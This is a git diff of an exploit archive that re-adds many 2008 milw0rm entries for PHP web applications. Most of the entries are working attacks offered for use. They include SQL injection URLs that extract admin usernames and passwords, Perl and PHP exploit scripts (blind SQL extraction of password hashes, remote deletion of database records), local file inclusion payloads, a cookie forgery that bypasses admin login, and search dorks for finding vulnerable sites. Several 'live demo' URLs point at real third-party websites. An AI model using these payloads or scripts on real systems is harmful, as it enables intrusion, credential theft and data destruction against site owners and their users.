showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1-- +#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1-- +#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1-- +# +#===================================================================================================== +#Discoverd By : -tmh- +# +#Contact : tmh[at]sys-flaw.com +# +#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B , +# Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack abcdef , +# +# +#===================================================================================================== + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6443.pl b/platforms/php/webapps/6443.pl index aa128d9e3..c329fc967 100755 --- a/platforms/php/webapps/6443.pl +++ b/platforms/php/webapps/6443.pl 
@@ -1,48 +1,48 @@ -#!/usr/bin/perl -# --==+============================================================================+==-- -# --==+ WebPortal <= 0.7.4 Remote SQL Injection Exploit +==-- -# --==+============================================================================+==-- -# -# [*] Discovered By: StAkeR ~ StAkeR@hotmail.it -# [+] Discovered On: 12 Sep 2008 -# [+] Download: http://webportal.ivanoculmine.com/download.php?mid=14 -# -# [*] SQL Injection -# [+] download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1 -# [+] get file "download.php" and you can read -# -# [*] Exploit: -# - # ---------------------------------------------------------- - # WebPortal <= 0.7.4 Remote SQL Injection Exploit - # Author: StAkeR - StAkeR[at]hotmail[dot]it - # ---------------------------------------------------------- - # Usage: perl http://localhost/cms - # ---------------------------------------------------------- - - use strict; - use LWP::Simple; - - - my $domain = shift @ARGV or banner(); - my $injsql = "/download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1"; - - if(get($domain.$injsql) =~ /([0-9a-f]{32})/) - { - print "[+] Exploit Succesfull!\n"; - print "[+] MD5 Password: ${1}\n"; - } - else - { - print "[!] Exploit Failed!\n"; - print "[!] 
Site Not Vulnerable!\n"; - } - - sub banner - { - print "[+] WebPortal <= 0.7.4 Remote SQL Injection Exploit\n"; - print "[+] Usage: ${0} http://[host]\n"; - return exit; - } - -# milw0rm.com [2008-09-12] +#!/usr/bin/perl +# --==+============================================================================+==-- +# --==+ WebPortal <= 0.7.4 Remote SQL Injection Exploit +==-- +# --==+============================================================================+==-- +# +# [*] Discovered By: StAkeR ~ StAkeR@hotmail.it +# [+] Discovered On: 12 Sep 2008 +# [+] Download: http://webportal.ivanoculmine.com/download.php?mid=14 +# +# [*] SQL Injection +# [+] download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1 +# [+] get file "download.php" and you can read +# +# [*] Exploit: +# + # ---------------------------------------------------------- + # WebPortal <= 0.7.4 Remote SQL Injection Exploit + # Author: StAkeR - StAkeR[at]hotmail[dot]it + # ---------------------------------------------------------- + # Usage: perl http://localhost/cms + # ---------------------------------------------------------- + + use strict; + use LWP::Simple; + + + my $domain = shift @ARGV or banner(); + my $injsql = "/download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1"; + + if(get($domain.$injsql) =~ /([0-9a-f]{32})/) + { + print "[+] Exploit Succesfull!\n"; + print "[+] MD5 Password: ${1}\n"; + } + else + { + print "[!] Exploit Failed!\n"; + print "[!] Site Not Vulnerable!\n"; + } + + sub banner + { + print "[+] WebPortal <= 0.7.4 Remote SQL Injection Exploit\n"; + print "[+] Usage: ${0} http://[host]\n"; + return exit; + } + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6444.txt b/platforms/php/webapps/6444.txt index 7a3b6b383..723bba584 100755 --- a/platforms/php/webapps/6444.txt +++ b/platforms/php/webapps/6444.txt 
@@ -1,65 +1,65 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# -# --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l and h4x0r -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com, vaibhavaher@gmail.com -# -# Share the c0de! -# -################################################################ -# -# Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability -# -# App Name: iBoutique v4.0 -# -# App Home: http://www.netartmedia.net/iboutique/ -# -# App Demo: http://www.netartmedia.net/iboutique/demo.html -# -################################################################# -# Dork: Powered by iBoutique v4.0 -# -# -# POC: -# For username : -# -# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- -# -# For password : -# -# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- -# -# -# -# Live Demo: -# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- -# -# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- -# -# -# -# -# -# 
-################################################################ -# Vuln Discovered 12th Sep 2008 - -# milw0rm.com [2008-09-12] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# +# --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l and h4x0r +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com, vaibhavaher@gmail.com +# +# Share the c0de! 
+# +################################################################ +# +# Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability +# +# App Name: iBoutique v4.0 +# +# App Home: http://www.netartmedia.net/iboutique/ +# +# App Demo: http://www.netartmedia.net/iboutique/demo.html +# +################################################################# +# Dork: Powered by iBoutique v4.0 +# +# +# POC: +# For username : +# +# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- +# +# For password : +# +# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- +# +# +# +# Live Demo: +# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- +# +# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- +# +# +# +# +# +# +################################################################ +# Vuln Discovered 12th Sep 2008 + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6445.txt b/platforms/php/webapps/6445.txt index 5ae90228f..560b08169 100755 --- a/platforms/php/webapps/6445.txt +++ b/platforms/php/webapps/6445.txt 
@@ -1,27 +1,27 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . - -################################################################ -# SQL Injection -# -# Found by ::: mr.al7rbi -# -# Contact ::: n16 [at] live.com -# -# my Group ::: mr.al7rbi team -# -################################################################ - -Title: SkaLinks - Link Exchange Script -d0rk: 2005. Powered by SkaLinks - Link Exchange Script -DESCRIPTION: -add admin -EXPLOITS: -http://example.com/admin/register.php -example: -http://xxx.dk/partner/admin/register.php -Special Greetz for : tryag.cc/cc -Greetz : noaf_07 & aloosh & ili The General ili & fhad & all tryag members & all muslims - -# milw0rm.com [2008-09-12] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . + +################################################################ +# SQL Injection +# +# Found by ::: mr.al7rbi +# +# Contact ::: n16 [at] live.com +# +# my Group ::: mr.al7rbi team +# +################################################################ + +Title: SkaLinks - Link Exchange Script +d0rk: 2005. Powered by SkaLinks - Link Exchange Script +DESCRIPTION: +add admin +EXPLOITS: +http://example.com/admin/register.php +example: +http://xxx.dk/partner/admin/register.php +Special Greetz for : tryag.cc/cc +Greetz : noaf_07 & aloosh & ili The General ili & fhad & all tryag members & all muslims + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6446.txt b/platforms/php/webapps/6446.txt index 1f3ba586f..eaa2a66e2 100755 --- a/platforms/php/webapps/6446.txt +++ b/platforms/php/webapps/6446.txt 
@@ -1,31 +1,31 @@ -#===================================================================================================== -#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit -#===================================================================================================== -# -# -#Venedor site : http://www.vblogix.com/ -# -#Demo site: http://www.vb-demo.com/ -# -#Version : v1.0 -# -#===================================================================================================== -# -#DORK : no have -# -# -#Exploit : -#-------------------------------- -# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/* -# -#===================================================================================================== -#Discoverd By : FIREH4CK3R -# -#Contact : firehacker_msn[at]hotmail.com -# -#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR -# -# -#===================================================================================================== - -# milw0rm.com [2008-09-12] +#===================================================================================================== +#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit +#===================================================================================================== +# +# +#Venedor site : http://www.vblogix.com/ +# +#Demo site: http://www.vb-demo.com/ +# +#Version : v1.0 +# +#===================================================================================================== +# +#DORK : no have +# +# +#Exploit : +#-------------------------------- +# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/* +# +#===================================================================================================== +#Discoverd By : FIREH4CK3R +# +#Contact : firehacker_msn[at]hotmail.com +# +#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR +# +# 
+#===================================================================================================== + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6447.txt b/platforms/php/webapps/6447.txt index 35342ff66..822a5fdfa 100755 --- a/platforms/php/webapps/6447.txt +++ b/platforms/php/webapps/6447.txt 
@@ -1,59 +1,59 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit - -# -# Vendor: http://www.powie.de - -# -# -########################################################### -# -# d0rk:n/a -# -########################################################### - - Exploit:- - http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/* - - - - Live Demo: - http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/* - - Admin panel is at http://site.com/script/admin/ - - The password in in plain text :P - -########################################################### -# -# Bug discovered : 12 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-12] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / 
__ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit + +# +# Vendor: http://www.powie.de + +# +# +########################################################### +# +# d0rk:n/a +# +########################################################### + + Exploit:- + http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/* + + + + Live Demo: + http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/* + + Admin panel is at http://site.com/script/admin/ + + The password in in plain text :P + +########################################################### +# +# Bug discovered : 12 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6449.php b/platforms/php/webapps/6449.php index 1119f0b28..d1e242b98 100755 --- a/platforms/php/webapps/6449.php +++ b/platforms/php/webapps/6449.php 
@@ -1,83 +1,83 @@ - php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2 -# Live Demo : -# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 -# -############################################################### -'); -if ($argc > 1) { -$url = $argv[1]; -if ($argc < 3) { -$userid = 1; -} else { -$userid = $argv[2]; -} -$r = strlen(file_get_contents($url."+and+1=1/*")); -echo "\nExploiting:\n"; -$w = strlen(file_get_contents($url."+and+1=0/*")); -$t = abs((100-($w/$r*100))); -echo "Password: "; -for ($j = 1; $j <= 32; $j++) { - for ($i = 46; $i <= 102; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*")); - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 102; - } - } -} -echo "\nUsername: "; -for ($i=1; $i <= 30; $i++) { -$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $count = $i; - $i = 30; - } -} -for ($j = 1; $j < $count; $j++) { - for ($i = 46; $i <= 122; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*")); - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 122; - } - } -} -} else { -echo "\nExploiting failed: By Stack\n"; -} -?> - -# milw0rm.com 
[2008-09-13] + php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2 +# Live Demo : +# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 +# +############################################################### +'); +if ($argc > 1) { +$url = $argv[1]; +if ($argc < 3) { +$userid = 1; +} else { +$userid = $argv[2]; +} +$r = strlen(file_get_contents($url."+and+1=1/*")); +echo "\nExploiting:\n"; +$w = strlen(file_get_contents($url."+and+1=0/*")); +$t = abs((100-($w/$r*100))); +echo "Password: "; +for ($j = 1; $j <= 32; $j++) { + for ($i = 46; $i <= 102; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*")); + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 102; + } + } +} +echo "\nUsername: "; +for ($i=1; $i <= 30; $i++) { +$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $count = $i; + $i = 30; + } +} +for ($j = 1; $j < $count; $j++) { + for ($i = 46; $i <= 122; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*")); + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 122; + } + } +} +} else { +echo "\nExploiting failed: By Stack\n"; +} +?> + +# milw0rm.com 
[2008-09-13]
diff --git a/platforms/php/webapps/645.pl b/platforms/php/webapps/645.pl
index d3cb7099d..8976d7594 100755
--- a/platforms/php/webapps/645.pl
+++ b/platforms/php/webapps/645.pl
@@ -164,6 +164,6 @@ print "\n";
 print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
 print "\n Command: SCAN URL HELP QUIT";
 print "\n\n\n\n\n\n\n\n\n\n\n";
-};
-
-# milw0rm.com [2004-11-21]
+};
+
+# milw0rm.com [2004-11-21]
diff --git a/platforms/php/webapps/6450.pl b/platforms/php/webapps/6450.pl
index 2b2a5e68c..8c3f9b48c 100755
--- a/platforms/php/webapps/6450.pl
+++ b/platforms/php/webapps/6450.pl
@@ -1,56 +1,56 @@ -#!/usr/bin/perl -W - -# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -# File affected: include/draw-delete.php (id) - -# Vuln Code: - -# 06: $did = $_GET['id']; -# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); - -# by ka0x -# D.O.M Labs - Security Researchers -# - www.domlabs.org - -# - -# ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3 - - -use LWP::UserAgent; - -my $host = $ARGV[0]; -my $did = $ARGV[1]; - -die &_USAGE unless $ARGV[1]; - -sub _USAGE -{ - die " - - Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit - - - by ka0x (www.domlabs.org) - - usage: ./$0 - ex: ./$0 http://localhost/sportspanel 2 - "; -} - -my $ua = LWP::UserAgent->new() or die; -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); - -my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did); -my $res = $ua->request($req); -my $con = $res->content; - -if ($res->is_success){ - if($con =~ /$did/){ - print "[+] The Game \"$did\" has been deleted from the database!\n"; - } -} - -else{ - print "[-] Exploit Failed!"; -} - -__END__ - -# milw0rm.com [2008-09-13] +#!/usr/bin/perl -W + +# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit +# File affected: include/draw-delete.php (id) + +# Vuln Code: + +# 06: $did = $_GET['id']; +# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); + +# by ka0x +# D.O.M Labs - Security Researchers +# - www.domlabs.org - +# + +# ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3 + + +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $did = $ARGV[1]; + +die &_USAGE unless $ARGV[1]; + +sub _USAGE +{ + die " + - Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit - + - by ka0x (www.domlabs.org) + + usage: ./$0 + ex: ./$0 http://localhost/sportspanel 2 + "; +} + +my $ua = LWP::UserAgent->new() or die; +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); + +my $req = 
HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did); +my $res = $ua->request($req); +my $con = $res->content; + +if ($res->is_success){ + if($con =~ /$did/){ + print "[+] The Game \"$did\" has been deleted from the database!\n"; + } +} + +else{ + print "[-] Exploit Failed!"; +} + +__END__ + +# milw0rm.com [2008-09-13] diff --git a/platforms/php/webapps/6451.txt b/platforms/php/webapps/6451.txt index 68f702087..f50f517c4 100755 --- a/platforms/php/webapps/6451.txt +++ b/platforms/php/webapps/6451.txt 
@@ -1,44 +1,44 @@ -############################################################################################################ -[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure -[+] Discovered By SirGod -[+] MorTal TeaM -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke -############################################################################################################ - - [+] Local File Inclusion - - - PoC 1 : - - http://[target]/[path]/comments.php?language=[Local File]%00 - - Example 1 : - - http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00 - - - PoC 2 : - - http://[target]/[path]/install/help.php?language=[Local File]%00 - - Example 2 : - - http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00 - - - - [+] PHPInfo Disclosure - - - PoC: - - http://[target]/[path]/install/info.php - - Example : - - http://127.0.0.1/talkback/install/info.php - - -############################################################################################################## - -# milw0rm.com [2008-09-13] +############################################################################################################ +[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure +[+] Discovered By SirGod +[+] MorTal TeaM +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke +############################################################################################################ + + [+] Local File Inclusion + + + PoC 1 : + + http://[target]/[path]/comments.php?language=[Local File]%00 + + Example 1 : + + http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00 + + + PoC 2 : + + http://[target]/[path]/install/help.php?language=[Local File]%00 + + Example 2 : + + http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00 + + + + [+] PHPInfo Disclosure + + + PoC: + + 
http://[target]/[path]/install/info.php + + Example : + + http://127.0.0.1/talkback/install/info.php + + +############################################################################################################## + +# milw0rm.com [2008-09-13] diff --git a/platforms/php/webapps/6452.txt b/platforms/php/webapps/6452.txt index 359760097..047822c01 100755 --- a/platforms/php/webapps/6452.txt +++ b/platforms/php/webapps/6452.txt @@ -1,13 +1,13 @@ - fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln - -Download : http://sourceforge.net/projects/phpsmartcom/ - -Local File Inclusion: -http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00 - -SQL Injection: -http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/* - -Credits : Neo , R3dm0v3 - -# milw0rm.com [2008-09-13] + fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln + +Download : http://sourceforge.net/projects/phpsmartcom/ + +Local File Inclusion: +http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00 + +SQL Injection: +http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/* + +Credits : Neo , R3dm0v3 + +# milw0rm.com [2008-09-13] diff --git a/platforms/php/webapps/6455.txt b/platforms/php/webapps/6455.txt index 0590bb7fa..6d135581b 100755 --- a/platforms/php/webapps/6455.txt +++ b/platforms/php/webapps/6455.txt 
@@ -1,26 +1,26 @@ -================================================================================ - Linkarity (link.php) Remote SQL Injection Vulnerability -================================================================================ - - - -Discovered By: Egypt Coder - -home : WWW.Sec-Area.com - -Mail: Egyptcoder@hotmail.com - - - -Dork: Powered by: Linkarityâ„¢ - - -Exploit : - -http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18 - - - -Greets : ProViDoR , rUnViruS, Error Code, H666p , Fear Master , Broken Security - -# milw0rm.com [2008-09-13] +================================================================================ + Linkarity (link.php) Remote SQL Injection Vulnerability +================================================================================ + + + +Discovered By: Egypt Coder + +home : WWW.Sec-Area.com + +Mail: Egyptcoder@hotmail.com + + + +Dork: Powered by: Linkarityâ„¢ + + +Exploit : + +http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18 + + + +Greets : ProViDoR , rUnViruS, Error Code, H666p , Fear Master , Broken Security + +# milw0rm.com [2008-09-13] diff --git a/platforms/php/webapps/6456.txt b/platforms/php/webapps/6456.txt index 853445006..8101dc127 100755 --- a/platforms/php/webapps/6456.txt +++ b/platforms/php/webapps/6456.txt 
@@ -1,30 +1,30 @@ -############################################################################################### -[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database -[+] Discovered By SirGod -[+] wWw.MorTal-TeaM.OrG -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke -################################################################################################ - - [+] Arbitrary Backup Database - - Follow the example and the database download will begin : - - [dbname]_db_backup.sql - - - PoC : - - http://[target]/[path]/admin/backupdb.php - - Example : - - http://127.0.0.1/book/admin/backupdb.php - - Live Demo : - - http://phpversion.com/book/admin/backupdb.php - - -################################################################################################ - -# milw0rm.com [2008-09-13] +############################################################################################### +[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database +[+] Discovered By SirGod +[+] wWw.MorTal-TeaM.OrG +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke +################################################################################################ + + [+] Arbitrary Backup Database + + Follow the example and the database download will begin : + + [dbname]_db_backup.sql + + + PoC : + + http://[target]/[path]/admin/backupdb.php + + Example : + + http://127.0.0.1/book/admin/backupdb.php + + Live Demo : + + http://phpversion.com/book/admin/backupdb.php + + +################################################################################################ + +# milw0rm.com [2008-09-13] diff --git a/platforms/php/webapps/6457.txt b/platforms/php/webapps/6457.txt index 04b75e0ee..6485c6b7b 100755 --- a/platforms/php/webapps/6457.txt +++ b/platforms/php/webapps/6457.txt 
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
----
-exploit:
-javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";
-
-# milw0rm.com [2008-09-14]
+###############################################################################################
+[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";
+
+# milw0rm.com [2008-09-14]
diff --git a/platforms/php/webapps/6460.txt b/platforms/php/webapps/6460.txt
index b314517e0..d2c834cd9 100755
--- a/platforms/php/webapps/6460.txt
+++ b/platforms/php/webapps/6460.txt
